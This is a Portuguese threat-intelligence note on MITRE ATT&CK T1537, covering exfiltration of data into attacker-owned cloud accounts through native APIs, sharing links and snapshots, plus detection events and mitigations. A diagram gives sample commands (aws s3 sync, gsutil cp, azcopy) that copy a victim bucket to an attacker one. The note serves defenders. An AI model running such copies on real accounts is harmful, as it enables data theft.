# T1537 - Transfer Data to Cloud Account
## Visão Geral
T1537 descreve uma forma de exfiltração que explora a confiança implícita dos ambientes de nuvem: em vez de enviar dados para infraestrutura controlada externamente, o adversário transfere os dados **dentro do mesmo provedor cloud** - de uma conta comprometida para uma conta própria.
Essa abordagem é particularmente eficaz contra soluções de DLP e monitoramento perimetral que inspecionam tráfego saindo para a internet, mas ignoram movimentações internas ao ecossistema de um provedor (AWS para AWS, Azure para Azure, Google Cloud para Google Cloud). O tráfego usa APIs nativas e endereçamento interno, tornando-o práticamente indistinguível de operações legítimas.
```mermaid
graph TB
A([Conta de vítima comprometida]) --> B{Método de transferência}
B --> C[APIs nativas do provedor]
B --> D[Mecanismos de compartilhamento]
B --> E[Backup / Snapshot de instância]
C --> C1[AWS S3 cross-account copy<br/>aws s3 sync s3://victim-bucket s3://attacker-bucket]
C --> C2[Azure AzCopy entre tenants<br/>azcopy copy victim-container attacker-container]
C --> C3[GCP gsutil cross-project<br/>gsutil cp -r gs://victim gs://attacker]
D --> D1[Azure SAS URI<br/>link anônimo por tempo limitado]
D --> D2[AWS Pre-signed URL<br/>acesso temporário sem credencial]
D --> D3[Google Drive compartilhamento<br/>anônimo ou por e-mail do adversário]
E --> E1[AWS AMI snapshot<br/>transferida para conta controlada]
E --> E2[Azure Managed Disk export<br/>cópia de VM completa]
C1 & C2 & C3 & D1 & D2 & D3 & E1 & E2 --> F([Dados na conta do adversário])
F --> G[Acesso persistente aos dados<br/>fora do ambiente da vítima]
```
## Como Funciona
### Transferência via API Nativa (Cloud-to-Cloud)
Cada grande provedor expõe APIs que permitem copiar objetos entre buckets ou contêineres de contas diferentes. Com credenciais comprometidas da conta da vítima, o adversário configura permissões de leitura para sua própria conta e executa a cópia:
- **AWS:** `aws s3 sync` com bucket policy permitindo cross-account access
- **Azure:** `azcopy copy` de um contêiner de Blob Storage para outro tenant via token SAS
- **GCP:** `gsutil cp` com IAM binding concedendo acesso ao projeto do adversário
Esse tráfego viajá pelo backbone interno do provedor, sem cruzar a internet pública - evitando inspeção por firewalls e proxies da organização.
### Mecanismos de Compartilhamento Temporário
Provedores oferecem mecanismos nativos para compartilhamento controlado de dados:
- **Azure SAS (Shared Access Signature):** URI com assinatura criptográfica que concede acesso temporário a um contêiner ou blob sem exigir credenciais completas. O adversário gera o URI na conta comprometida e o usa de qualquer lugar.
- **AWS Pre-signed URLs:** funcionam de forma similar - concedem acesso GET ou PUT temporário a um objeto S3.
- **Links anônimos (OneDrive, Google Drive):** em ambientes SaaS, o adversário pode criar links de compartilhamento público para documentos e arquivos corporativos sensíveis.
### Backup e Snapshot de Instâncias
Em ambientes IaaS, adversários podem criar snapshots de volumes e discos (incluindo instâncias EC2 completas via AMI) e transferi-los para contas controladas. Essa técnica entrega não apenas dados, mas potencialmente a configuração completa da máquina - incluindo credenciais em disco e certificados.
Incidentes documentados incluem a criação de AMIs customizadas de servidores de banco de dados e sua posterior transferência para contas AWS controladas pelo atacante.
## Evasão e Detecção
A principal dificuldade de detecção está na natureza do tráfego: **ele parece legítimo**. Organizações que monitoram apenas transferências para destinos externos à nuvem ficam cegas para essa técnica.
> [!warning] Pontos de detecção críticos
> - **CloudTrail / Azure Monitor / GCP Audit Logs:** eventos de `GetObject`, `CopyObject`, `PutBucketPolicy` com contas externas como principals
> - **Criação de SAS URIs e pre-signed URLs:** eventos `GenerateSasToken`, `CreatePresignedPost` fora do padrão operacional
> - **Novos snapshots ou AMIs:** alertar em `CreateSnapshot`, `CreateImage`, `RegisterImage` seguidos de `ModifySnapshotAttribute` com `AddUserGroup` externo
> - **Compartilhamento de arquivos com e-mails externos (SaaS):** eventos de compartilhamento de OneDrive ou Google Drive com domínios fora da organização
> [!tip] Correlação recomendada
> Combinar alertas de T1537 com [[t1078-valid-accounts|T1078 - Contas Válidas]] e [[t1530-data-from-cloud-storage|T1530 - Dados de Armazenamento Cloud]]: a sequência típica é comprometer credenciais → acessar dados → exfiltrar para conta própria.
## Contexto de Uso e LATAM
[[g1039-redcurl|RedCurl]], grupo de espionagem corporativa com foco em roubo de documentos sigilosos, usa técnicas de cloud-to-cloud exfiltration em campanhas contra empresas de mineração, finanças e advocacia - setores com presença relevante no Brasil e América Latina.
[[g1053-storm-0501|Storm-0501]] e [[g1032-inc-ransom|INC Ransom]] operam com modelo de dupla extorsão: exfiltram dados para ambiente controlado antes de criptografar a infraestrutura da vítima. O uso de T1537 garante que os dados permaneçam acessíveis ao grupo mesmo após a vítima restaurar sistemas.
Em ambientes corporativos com adoção crescente de Microsoft 365 e AWS no Brasil, a superfície de ataque para esta técnica está em expansão - especialmente em organizações sem CASB (Cloud Access Security Broker) ou políticas de prevenção de exfiltração em nível de SaaS.
## Mitigações
| ID | Mitigação | Aplicação |
|----|-----------|-----------|
| [[m1057-data-loss-prevention\|M1057 - Data Loss Prevention]] | Implementar DLP em nível de cloud (CASB) para detectar transferências anômalas entre contas |
| [[m1018-user-account-management\|M1018 - User Account Management]] | Revisar e limitar permissões cross-account; remover acesso desnecessário entre contas |
| [[m1054-software-configuration\|M1054 - Software Configuration]] | Desabilitar compartilhamento público em buckets S3/Blob Storage por padrão; usar políticas de organização |
| [[m1037-filter-network-traffic\|M1037 - Filter Network Traffic]] | Restringir quais contas podem ser destinos de cópias via Service Control Policies (AWS SCP) ou Azure Policy |
## Threat Actors que Usam
- [[g1053-storm-0501|Storm-0501]] - ransomware com exfiltração prévia em ambientes Azure e AWS
- [[g1032-inc-ransom|INC Ransom]] - dupla extorsão, transferência de dados para cloud controlada antes do ransom
- [[g1039-redcurl|RedCurl]] - espionagem corporativa, roubo de documentos via cloud compartilhado
---
*Fonte: MITRE ATT&CK - T1537, versão 16.2*